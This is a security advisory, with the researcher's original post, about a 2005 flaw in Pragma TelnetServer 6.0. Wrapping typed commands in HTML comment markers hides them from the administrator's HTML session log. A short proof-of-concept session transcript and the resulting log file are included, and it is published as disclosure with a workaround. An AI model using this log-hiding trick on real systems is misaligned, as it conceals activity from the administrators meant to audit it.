Pragma TelnetServer Lets Remote Authenticated Users Obfuscate Log Entries During Display
|
|
SecurityTracker Alert ID: 1014127 |
|
SecurityTracker URL: http://securitytracker.com/id/1014127
|
|
CVE Reference:
CVE-2005-1969
(Links to External Site)
|
Updated: Nov 2 2008
|
Original Entry Date: Jun 8 2005
|
Impact:
Modification of system information
|
Exploit Included: Yes
|
Version(s): 6.0
|
Description:
rgod reported a vulnerability in the Pragma TelnetServer. A remote authenticated user can obfuscate certain log entries.
A remote authenticated user can type '<!--' on the command line, followed by arbitrary commands, followed by '-->' on the command line. When the administrator views the HTML log files, the arbitrary commands will not be displayed.
|
Impact:
A remote authenticated user can cause log entries to be hidden when displayed by the administrator via the HTML log files.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.pragmasys.com/TelnetServer/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Windows (NT), Windows (2000), Windows (2003), Windows (XP)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 7 Jun 2005 20:02:28 +0200
Subject: pragma telnetserver 6.0 - html log obfuscation
|
Pragma Telnetserver 6.0 - html log obfuscation
by rgod 07/06/2005
site:http://rgod.altervista.org
email: rgod@autistici.org
vendor: Pragma Systems
site http://www.pragmasys.com
A remote user can cause the administrator's view
of the html log files to be obfuscated.
POC:
First I login, then I digit "<!--", then "dir",
then "-->"
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\rgod><!--
Sintassi del comando errata.
C:\Documents and Settings\rgod>dir
Il volume nell'unità C non ha etichetta.
Numero di serie del volume: 8480-BF80
Directory di C:\Documents and Settings\rgod
03/06/2005 11.28 <DIR> .
03/06/2005 11.28 <DIR> ..
06/11/2004 09.36 <DIR> Menu Avvio
03/06/2005 11.29 <DIR> Documenti
03/06/2005 11.29 <DIR> Preferiti
06/11/2004 09.36 <DIR> Desktop
04/06/2005 12.14 <DIR> ZDE
07/06/2005 10.40 6 prova.txt
07/06/2005 10.40 24 prova.bat
2 File 30 byte
7 Directory 48.144.384 byte disponibili
C:\Documents and Settings\rgod>-->
Sintassi del comando errata.
C:\Documents and Settings\rgod>exit
Connessione all'host perduta.
C:\Documents and Settings\rgod>
Here is the html file produced, view it in your browser (where is
"dir" ? :) ):
<HTML>
<HEAD>
<TITLE>rgod Remote Session Log Tue Jun 07 19:23:41 2005
</TITLE>
</HEAD>
<BODY>
<TABLE CELLPADDING="3" CELLSPACING="0" WIDTH="0" HEIGHT="0" BORDER="1">
<TR>
<TD ALIGN="LEFT"><B>Product</B></TD>
<TD ALIGN="LEFT">TelnetServer</TD>
</TR>
<TR>
<TD ALIGN="LEFT"><B>User Name</B></TD>
<TD ALIGN="LEFT">rgod</TD>
</TR>
<TR>
<TD ALIGN="LEFT"><B>Windows NT Domain</B></TD>
<TD ALIGN="LEFT">HACKER</TD>
</TR>
<TR>
<TD ALIGN="LEFT"><B>Remote Host Name</B></TD>
<TD ALIGN="LEFT">127.0.0.1</TD>
</TR>
<TR>
<TD ALIGN="LEFT"><B>Command Shell PID</B></TD>
<TD ALIGN="LEFT">312</TD>
</TR>
<TR>
<TD ALIGN="LEFT"><B>Service PID</B></TD>
<TD ALIGN="LEFT">360</TD>
</TR>
</TR>
<TR>
<TD ALIGN="LEFT"><B>Logon Time</B></TD>
<TD ALIGN="LEFT">Tue Jun 07 19:23:41 2005
</TD>
</TR>
</TABLE>
<BR><HR>
<H3>Begin User Entered Data</H3>
<PRE>
<!--
dir
-->
exit
</PRE>
<H3>End User Entered Data</H3>
</BODY>
</HTML>
solution:
use the clear text log option
rgod
a copy of this document at: http://www.rgod.altervista.org/pragma.html
|
|
